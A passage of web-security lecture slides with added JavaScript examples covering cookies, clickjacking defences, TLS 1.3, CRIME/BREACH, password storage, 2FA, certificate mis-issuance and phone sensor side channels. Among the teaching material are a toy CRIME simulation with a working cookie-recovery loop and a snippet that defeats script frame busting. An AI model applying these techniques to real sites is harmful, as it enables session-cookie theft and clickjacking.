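  return reqPath === cookiePath ||
    (reqPath.startsWith(cookiePath) &&
     (cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/'));
}

// Parse one Set-Cookie header value in the context of the response URL.
// Returns null if the cookie must be rejected.
function parseSetCookie(header, responseUrl) {
  const u = new URL(responseUrl);
  const parts = header.split(';').map(s => s.trim());
  const eq = parts[0].indexOf('=');
  if (eq < 1) return null;
  const c = {
    name: parts[0].slice(0, eq).trim(), value: parts[0].slice(eq + 1).trim(),
    domain: u.hostname, hostOnly: true, path: defaultPath(responseUrl),
    secure: false, httpOnly: false,
  };
  for (const attr of parts.slice(1)) {
    const [k, ...rest] = attr.split('=');
    const key = k.trim().toLowerCase();
    const val = rest.join('=').trim();
    if (key === 'domain') {
      const d = val.replace(/^\./, '').toLowerCase();
      // A response may only set cookies for its own host or a parent domain of it.
      if (!domainMatches(u.hostname, d)) return null;
      c.domain = d; c.hostOnly = false;
    } else if (key === 'path') {
      c.path = val.startsWith('/') ? val : defaultPath(responseUrl);
    } else if (key === 'secure') c.secure = true;
    else if (key === 'httponly') c.httpOnly = true;
  }
  return c;
}

// Store a cookie, replacing any existing one with the same (name, domain, path).
// With leaveSecureCookiesAlone a non-HTTPS response can neither set a Secure
// cookie nor overwrite/shadow an existing one (slide 60's attack).
function storeCookie(jar, header, responseUrl, { leaveSecureCookiesAlone = true } = {}) {
  const c = parseSetCookie(header, responseUrl);
  if (!c) return false;
  const fromHttps = new URL(responseUrl).protocol === 'https:';
  if (leaveSecureCookiesAlone && !fromHttps) {
    if (c.secure) return false;
    const shadowed = jar.some(o => o.secure && o.name === c.name &&
      (domainMatches(c.domain, o.domain) || domainMatches(o.domain, c.domain)) &&
      (pathMatches(c.path, o.path) || pathMatches(o.path, c.path)));
    if (shadowed) return false;
  }
  const i = jar.findIndex(o => o.name === c.name && o.domain === c.domain && o.path === c.path);
  if (i >= 0) jar.splice(i, 1);
  jar.push(c);
  return true;
}

// The Cookie header the browser would attach to a request for url.
function cookieHeaderFor(jar, url) {
  const u = new URL(url);
  const https = u.protocol === 'https:';
  return jar
    .filter(c => (c.hostOnly ? u.hostname === c.domain : domainMatches(u.hostname, c.domain)))
    .filter(c => pathMatches(u.pathname, c.path))
    .filter(c => !c.secure || https)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// What document.cookie exposes to script on a page at url: the same set minus
// HttpOnly cookies (slide 61).
function documentCookie(jar, url) {
  return cookieHeaderFor(jar.filter(c => !c.httpOnly), url);
}
```

With `auth=val; Domain=bank.com; Path=/; Secure; HttpOnly` set by https://www.bank.com, the jar sends the cookie to https://api.bank.com but not to http://www.bank.com or to another domain, and hides it from `document.cookie`. A Set-Cookie for `auth` in a plain-HTTP response from www.bank.com is refused by default; with `leaveSecureCookiesAlone: false` it replaces the Secure cookie and is then sent over HTTPS too, exactly the rewrite on slide 60.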
62. HTML5 Local Storage
Based on named key/value pairs
§ Store data based on a named key (a string)
§ Retrieve that data with the same key
§ Data can be any type supported by JavaScript
› Including strings, Booleans, integers, floats
› But data is actually stored as a string
Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the expected JavaScript datatype
Some browsers also implement Web SQL Database (since deprecated)
§ Other forms of local storage would also be useful
63. Example
Save a sentence in Local Storage:
localStorage.setItem('1', 'This is a sample sentence');
Retrieve it:
var data = localStorage.getItem('1');
Local Storage also supports length, removeItem() and clear().
64. Security issues
Storage per origin
§ Origin is: scheme, host, port
Could be accessed by user with local access (varies by browser)
Can be accessed by JavaScript in page
§ no httpOnly so vulnerable to XSS attacks
XSS attacks can read local storage
§ Do not store sensitive information
XSS attacks can write local storage
§ Do not trust data read from local storage
67. Sandbox techniques
Static analysis
§ No loads or stores permitted outside the data sandbox
› Enforced by operating system protection mechanisms
§ No unsafe instructions
› Examples: syscall, int, and lds.
§ Control flow integrity
› All direct, indirect branches target a safe instruction
Dynamic monitoring
§ Native Client runtime mediates system calls
69. Clickjacking
Attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page
Clicks meant for the visible page are hijacked and routed to another, invisible page
70. Clickjacking in the Wild
Google search for "clickjacking" returns 342,000 results… this is not a hypothetical threat!
Summer 2010: Facebook worm superimposes an invisible iframe over the entire page that links back to the victim's Facebook page
§ If the victim is logged in, the link is automatically recommended to the victim's friends as soon as the page is clicked on
Many clickjacking attacks against Twitter
§ Users send out tweets against their will
74. Frame Busting
Goal: prevent a web page from loading in a frame
§ Example: opening the login page in a frame would still display the correct passmark image, so a framed login looks legitimate
Frame busting:
if (top != self)
top.location.href = location.href
75. Better Frame Busting
Problem: the JavaScript onUnload event. The framing page can register an unload handler that aborts the navigation the frame-busting code starts, so the check above can be defeated:
<body onUnload="javascript: cause_an_abort;">
Try this instead: run the page's own code only once the check has passed, so a framed copy shows nothing useful even if the navigation is blocked:
if (top != self)
top.location.href = location.href
else { … code of page here …}
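Because script-based frame busting can be defeated (the unload trick above, or a sandboxed iframe without allow-top-navigation, slides 39 and 40), the reliable defence is a response header that the browser enforces before any script runs: X-Frame-Options, or the CSP frame-ancestors directive, which takes precedence when both are present. The function below evaluates those headers the way a browser does. It is an added example, not code from the slides or from any browser; header values and origins are made up.

```javascript
// Added example, not from the lecture slides: server-side framing policy as a
// browser evaluates it (X-Frame-Options and CSP frame-ancestors). Origins and
// header values are made up.

const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

function originOf(url) { return new URL(url).origin; }

// Match one CSP source expression against the embedding (ancestor) origin.
function sourceMatches(src, pageOrigin, ancestorOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return ancestorOrigin === pageOrigin;
  if (src === '*') return true;
  const a = new URL(ancestorOrigin);
  // scheme-source, e.g. "https:"
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return a.protocol === src.toLowerCase();
  // host-source: [scheme://]host[:port]; host may begin with "*." (any subdomain)
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && a.protocol !== scheme.toLowerCase() + ':') return false;
  const h = host.toLowerCase();
  if (wildcard ? !a.hostname.endsWith('.' + h) : a.hostname !== h) return false;
  const aPort = a.port || DEFAULT_PORT[a.protocol] || '';
  if (port && port !== '*' && port !== aPort) return false;
  return true;
}

// May a page served with these response headers be framed by a document at
// ancestorOrigin? frame-ancestors wins over X-Frame-Options when both exist.
function framingAllowed(headers, pageUrl, ancestorOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const pageOrigin = originOf(pageUrl);
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(s => s.trim()).find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1); // an empty list means 'none'
    return sources.some(s => sourceMatches(s, pageOrigin, ancestorOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return ancestorOrigin === pageOrigin;
  return true; // no policy; ALLOW-FROM is obsolete and ignored by current browsers
}
```

For a login page at https://bank.com, `framingAllowed({ 'X-Frame-Options': 'DENY' }, …)` refuses every embedder, `SAMEORIGIN` allows only https://bank.com itself, and `frame-ancestors 'self' https://*.partner.example` additionally admits HTTPS subdomains of partner.example but not partner.example itself or an HTTP embedder. Sending both headers is the usual practice; old browsers read X-Frame-Options, current ones use frame-ancestors.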
78. Topics for this section
TLS attacks and defenses:
Compression attacks: CRIME and BREACH, TLS 1.3
Password breaches and 2nd factor authentication
Certificate Authorities: compromises, Lets encrypt, universal TLS
New hardware security support: Intel SGX
Sensor abuse on mobile phones
80. Review: TLS 1.2
Handshake between browser and server (most common: server authentication only):
1. browser → server: client-hello
2. server → browser: server-hello + server certificate (contains the server's public key PK, issued by a CA); the server holds the matching secret key SK
3. key exchange (several options); e.g. client-key-exchange: the browser picks a random k and sends E(PK, k), the server decrypts it with SK
4. Finished messages
5. HTTP data encrypted with keys derived from k (KDF(k)) on both sides
81. Review: TLS record encryption (original design)
Browser and server share key k. Plaintext HTTP data is split into 16KB records; each record gets an integrity tag (MAC), then record and tag are encrypted together and sent as hdr | ciphertext.
The encryption method is called MAC-then-encrypt. Because the CBC padding is not covered by the MAC, the receiver's behaviour on decryption leaks information about it: the root of the padding-oracle attacks on TLS (Lucky13, POODLE, …). BEAST exploits the related chaining of CBC IVs across records in TLS 1.0.
82. TLS 1.3: a new version of TLS (finalized as RFC 8446 in 2018)
Record encryption:
• mandatory method: AES128-GCM
fast on x86 with AES-NI: Intel Skylake, 0.68 cycles/byte
• on weaker processors: CHACHA20_POLY1305
fast in software
Both methods provide authenticated encryption (no MAC-then-encrypt, no padding oracle)
83. TLS 1.3: a new version of TLS
Session setup:
• Forward secrecy required (the non-forward-secure RSA key transport of TLS 1.2 is gone)
• Zero round-trip (0-RTT) setup option: the client can send encrypted data on the first flight, right after client-hello (0-RTT data can be replayed, so it must be idempotent)
• Server certificate is encrypted (previously sent in the clear): stronger privacy when a server has multiple certificates
• Initiate a TLS session from a pre-shared secret, if one exists: more general than session resumption in TLS 1.2
85. Compression and Encryption
Strong desire to combine compression and encryption
How?
Option 1: first encrypt and then compress
Does not work … ciphertext looks like a random string
86. Compression and Encryption
Option 2: first compress and then encrypt
Used in many Internet protocols (TLS, HTTPS, QUIC, …)
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Recall in TLS: 16KB records
Support for compression before encryption
87. Trouble … [Kelsey’02]
Compress-then-encrypt reveals information:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
POST /bank.com/buy?id=goog
Cookie: uid=JhPL8g69684rksfsdg
Second message compresses better than first:
network observer can distinguish the two messages!
88. Even worse: the CRIME attack [RD'2012] (simplified)
Setting: JavaScript on an attacker page makes the victim's browser issue requests to the bank; the browser adds the cookie:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Goal: steal the user's bank cookie. JavaScript can issue requests to the bank, but cannot read the Cookie value.
89-94. Observe ciphertext size (each request fits one 16KB record)
The attacker puts a guess for the cookie's first character in the attacker-controlled part of the request:
POST /bank.com/buy?uid=A11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
POST /bank.com/buy?uid=B11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
POST /bank.com/buy?uid=J11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
For the guess "J" the compressor finds a one-byte-longer repeat, so the ciphertext is slightly shorter ⇒ the first character of the cookie is "J"
Next the attacker extends the known prefix:
POST /bank.com/buy?uid=Jh1111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Ciphertext is slightly shorter ⇒ the 2nd character of the cookie is "h"
Recover the entire cookie after at most 256 × (length of cookie) attempts; takes several seconds
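The length leak behind CRIME, simulated end to end, as an added example that is not code from the slides or from the CRIME authors. A toy greedy LZ77 stands in for the LZ77 stage of DEFLATE (real deflate adds Huffman coding, which masks a one-byte difference some of the time; the real attack pads the guess to push the length across a byte boundary and retries). Encryption is length-preserving, so the attacker's only observation is the compressed length. The cookie value is the slides' made-up one.

```javascript
// Added example, not code from the lecture slides: compress-then-encrypt
// length leak (slides 87-94) against a toy LZ77 compressor. The cookie value,
// the request layout and the alphabet are the example's own assumptions.

const SECRET_COOKIE = 'JhPL8g69684rksfsdg'; // what the attacker wants to learn

// Cost of a greedy LZ77 parse: 1 unit per literal, 3 units per (offset, length)
// match of at least MIN_MATCH bytes. Only the total is visible on the wire.
const MIN_MATCH = 3;
function lz77Length(text) {
  let cost = 0, i = 0;
  while (i < text.length) {
    let best = 0;
    for (let j = 0; j < i; j++) {
      let len = 0;
      while (i + len < text.length && text[j + len] === text[i + len]) len++;
      if (len > best) best = len;
    }
    if (best >= MIN_MATCH) { cost += 3; i += best; } else { cost += 1; i += 1; }
  }
  return cost;
}

// The victim's browser builds the request: attacker-chosen query string,
// browser-added Cookie header. Returns the length that encrypt(compress(req))
// would have; the attacker never sees the cookie itself.
function compressedRequestLength(attackerQuery) {
  const request =
    'POST /bank.com/buy?uid=' + attackerQuery + '\r\n' +
    'Cookie: uid=' + SECRET_COOKIE + '\r\n' +
    'Host: bank.com\r\n';
  return lz77Length(request);
}

// Attacker: extend the known prefix one character at a time, keeping the
// guess whose request compresses strictly shortest. When every candidate ties
// there is no more cookie to recover (or the character is outside ALPHABET).
const ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
function recoverCookie(oracle, maxLen = 64) {
  let known = '';
  while (known.length < maxLen) {
    let bestChar = null, bestLen = Infinity, ties = 0;
    for (const ch of ALPHABET) {
      const n = oracle(known + ch);
      if (n < bestLen) { bestLen = n; bestChar = ch; ties = 0; }
      else if (n === bestLen) ties++;
    }
    if (ties > 0) break;
    known += bestChar;
  }
  return known;
}
```

`compressedRequestLength('J')` is one unit shorter than `compressedRequestLength('A')`, because "uid=J" in the query matches one byte more of "uid=JhPL…" in the Cookie header; `recoverCookie(compressedRequestLength)` walks that one-unit signal through all 18 characters with 62 guesses per position. The same loop works against any compressor that finds repeats, which is why the fix was to stop compressing secrets together with attacker-controlled data rather than to tweak the compressor.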
95. What to do?
The problem: the observed ciphertext length reveals the compression ratio ⇒ reveals plaintext information … no good solution
Non-defense: add a random-length pad to the ciphertext (the attacker repeats each request and averages; the noise cancels)
First defense: compression disabled in TLS (and elsewhere, e.g., SPDY)
Problem: compression is also done at the HTTP layer (gzip of response bodies)
⇒ BREACH attack [PHG'13]
… much harder to disable HTTP compression in practice
96. What to do? [PHG’13]
Many web sites are impacted …
A proposed defense:
› Application layer “tags” sensitive data fields in
HTTP requests and responses (cookies, PII, etc.)
› HTTP-level compression only applied to non-sensitive fields
… but not easy to implement
98. A (small) sample of password breaches
2012: LinkedIn: 6 million passwords (hashed, unsalted)
2013:
Twitter: 250,000 passwords (hashed, salted)
Evernote: 50 million records: usernames, emails, hashed passwords
Adobe: 38 million records: email addresses, password hints, and encrypted passwords
2015:
LastPass: stolen email addresses, hashed master passwords (and salts) (server-side compromise)
99. Weak password choice
Users frequently choose weak passwords; a common occurrence.
Example: the RockYou password list, 2009 (6 most common passwords): 123456, 12345, Password, iloveyou, princess, abc123
A list of 360,000,000 words covers about 25% of user passwords
Adobe list, 2013 (most common passwords and the fraction of users who chose them):
Password       Fraction of users
123456         5%
123456789      1.1%
password       0.9%
adobe123       0.5%
12345678       0.5%
qwerty         0.5%
1234567        0.3%
Total          8.8%
100. How to store passwords
First rule of password storage: never store passwords in the clear!
Password database: one row per user with id, salt and hash:
id       salt    hash
Alice    SA      H(pwA, SA)
Bob      SB      H(pwB, SB)
…        …       …
To validate a password pwA presented for Alice, the server checks:
H(pwA, SA) ≟ StoredHash(Alice)
101. How to hash?
LinkedIn: SHA-1 hashed (unsalted) passwords
⇒ 6 days, 90% of passwords recovered by exhaustive search
The problem: SHA-1 is too fast … the attacker can try every word in a dictionary
To hash passwords:
• Use a keyed hash function (e.g., HMAC) where the key is stored in an HSM
• In addition: use a slow, space-hard function
102. How to hash?
PBKDF2, bcrypt: slow hash functions
• Slowness by “iterating” a crypto hash function like SHA256
• Parameterized number of iterations (e.g., set for 1000 evals/sec)
Problem: custom hardware (e.g., GPU) can evaluate
hash function much faster than a commodity CPU
⇒ attacker can do dictionary attack much faster
than 1000 evals/sec.
103. Why is custom hardware faster?
Only a small part of a CPU is used to hash, while a mining ASIC is nothing but hashing circuits.
(Bar chart on the slide: hash rate of an Intel Skylake x86 CPU vs. an Antminer S7, a $1,695 Bitcoin-mining ASIC rated at 5.06 TH/s; values as printed on the chart: 93 vs 5060, roughly 50x.)
104. How to hash?
Scrypt: a slow hash function AND need lots of memory to evaluate
⇒ custom hardware not much faster than commodity CPU
Problem: memory access pattern depends on input password
⇒ local attacker can learn memory access pattern for user’s pwd
⇒ eliminates need for memory in an offline dictionary attack
Is there a space-hard function where time is independent of pwd?
• Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
105. Strengthening User Authentication
One option: biometrics:
Fingerprints, retina, facial recognition, …
Benefit: hard to forget
Problems:
Biometrics are not generally secret
Cannot be changed, unlike passwords
⇒ Should primarily be used as a second authentication factor (note: CCC'13)
106. 2nd factor OTP authentication
Setup:
Choose a random key k
On device and server: sk = (k, 0), i.e. the key and a counter
Identification (counter-based):
1. device computes r0 ← HMAC(k, 0) and sends it; the server accepts iff r0 = HMAC(k, 0); both sides step to (k, 1)
2. next login: device sends r1 ← HMAC(k, 1); the server checks it against its own counter; both step to (k, 2)
Often the counter is replaced by time-based updates (TOTP, next slide)
107. Google authenticator
6-digit timed one-time passwords (TOTP) [RFC 6238]
Wide web-site adoption: Gmail, Dropbox, WordPress, …
› Open study: 6.4% Gmail user adoption [EuroSec 2015]
To enable TOTP for a user: the web site presents a QR code with embedded data:
otpauth://totp/Example:alice@dropbox.com?secret=JBSWY3DPEHPK3PXP&issuer=Example
(Subsequent user logins require the user to present a TOTP)
Danger: password reset upon user lockout (the recovery path is often weaker than the second factor it bypasses)
109. Server compromise exposes secrets
March 2011:
RSA announced servers attacked, secret keys stolen
⇒ enabled SecurID user impersonation
Can we do better? Answer: Yes!
110. Duo (also FIDO U2F)
Signature-based challenge response:
User database: id → pub-key (Alice → pkA, Bob → pkB, …); the secret key sk stays on the user's device
1. User submits the password on the login page
2. Server sends a 2FA challenge m to the device
3. Device signs: response = sign(sk, m) (with Duo, the user confirms on the phone)
4. Server verifies the signature with the stored pkA
No per-user secrets on the server (only public keys), simple user experience
112. Certificate Issuance Woes
Wrong issuance:
2011: a Comodo registration authority and the DigiNotar CA were hacked; certs issued for Gmail, Yahoo! Mail
2013: TurkTrust issued a cert for gmail.com (discovered by pinning)
2014: Indian NIC (intermediate CA trusted by the root CA India CCA) issued certs for Google and Yahoo! domains
Result: (1) India CCA revoked NIC's intermediate certificate; (2) Chrome restricts the India CCA root to only seven Indian domains
2015: MCS (intermediate CA cert issued by CNNIC) issued certs for Google domains
Result: the CNNIC root is no longer recognized by Chrome
⇒ a mis-issued cert enables eavesdropping on the user's session without any warning
113. Man in the middle attack using rogue cert
Attacker proxies data between user and bank; sees all traffic and can modify data at will.
1. Browser → attacker: ClientHello (for GET https://bank.com); attacker → bank: ClientHello
2. Bank → attacker: ServerCert (Bank); attacker → browser: ServerCert (rogue "BadguyCert": a cert for bank.com signed by a valid CA)
3. SSL key exchange browser ↔ attacker yields k1; SSL key exchange attacker ↔ bank yields k2
4. HTTP data between browser and attacker is encrypted with k1, between attacker and bank with k2; the attacker holds both keys
114. What to do? (many good ideas)
HPKP: HTTP public-key pinning
§ HTTP header that lets a site declare the CA keys (by hash) that may sign its cert
Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs=";
§ On subsequent HTTPS connections the browser rejects certs issued by other CAs
§ TOFU: trust on first use
§ (HPKP has since been removed from browsers: a wrong or lost pin locked sites out of their own domain)
Certificate Transparency (CT): [LL'12]
§ Idea: CAs must advertise a log of all certs they issue
§ Browser will only use a cert if it is on a CT log (in practice: if it carries signed certificate timestamps from logs)
• Efficient implementation using Merkle hash trees
• Companies can scan the logs to look for invalid issuance
115. A new CA: Let's Encrypt (letsencrypt.org)
A new open Certificate Authority: free certs
• Provisioning via an automated agent running on the web server
Step 1: install the agent on the web server
Step 2: the agent proves domain ownership (e.g. bank.com) by a DNS record under bank.com or a page at a fixed URI at bank.com, and sends a Certificate Signing Request (CSR) to the CA
Step 3: the Let's Encrypt CA checks domain ownership; if valid, it issues the cert and sends it to the agent
Step 4: the agent installs the cert on the web server … done
2016: 800K certs issued
117. Sensors on smart phones
Microphone
Camera
GPS
Light sensor
Compass
MEMS gyroscope / accelerometer
Power meter
Barometer
Heart rate / oximeter (on smart watches)
(The slide marks several of these as requiring no user permission to access.)
All have a specific function
Can they be abused??
118. Example 1: fingerprinting
Imperfections in camera sensor can be used to link pictures taken by same phone
[LG’06]
Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14]
§ App. can tell if it has been previously installed on device
app
device-id
119. Example 2: Gyrophone [MBN’14]
Phone gyroscope: measures vibrations (used for games)
Trouble:
› Gyroscope picks up air vibrations (a.k.a speech)
› Sample rate (apps.): 200Hz
› Machine learning ⇒ can recognize some speech
120. Example 3: Power usage sensor
Modern phones measure power drained from battery
Enables apps to optimize power use
Repeatedly read:
/sys/class/power_supply/battery/voltage_now
/sys/class/power_supply/battery/current_now
Unrestricted access.
Can this be abused?
121. Example 3: Power usage sensor
Can this be abused? [MBSN’15]
Observation: power used by radio depends on
distance and obstacles to cell tower
122. So what?
Our work: [MBSN'15]
power readings + machine learning ⇒ GPS
Why? Routes in a city have unique power fingerprints
Three goals (all achieved):
1. identify the route a car is taking among a known set of routes
2. identify the car's location along a known route
3. identify the car's route based on a database of pre-measured short segments
123. Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
125. Lessons
Sensors can have unintended consequences
There is risk in giving apps direct access to sensors
Prevention:
• Always require permissions to access sensors
• Reduce data from sensors to min needed for utility
or only provide abstract view of sensor data
126. Final note: limitations of air gaps
A machine holds sensitive data and is isolated from the network
• If it gets infected, can the malware exfiltrate data?
Answer: yes! [Usenix Sec 2015]
• Mimic GSM signals using the memory data bus
• Use the x86 instruction MOVNTDQ m128, xmm (a non-temporal store that bypasses the cache, so every store drives the bus)
• Effective for 60 feet